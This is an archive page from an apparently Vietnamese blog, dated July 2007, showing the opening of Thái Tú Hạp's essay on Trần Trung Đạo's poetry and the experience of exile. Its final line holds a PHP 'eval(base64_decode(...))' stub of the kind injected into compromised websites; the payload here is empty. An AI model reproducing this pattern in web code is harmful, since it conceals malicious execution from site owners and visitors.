Archive for July 25th, 2007

Thái Tú Hạp: Vài Cảm Tưởng Về Cõi Thơ Trần Trung Đạo

Ba mươi năm lưu vong nơi đất khách, chúng ta có cảm tưởng như thời gian trôi quá nhanh so với tuổi đời hữu hạn. Ba mươi năm thừa khả năng tạo nên những thế hệ trưởng thành từ trong nước cũng như trên những phần đất tự do mà ch

07.25.2007 | Nhận Xét |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>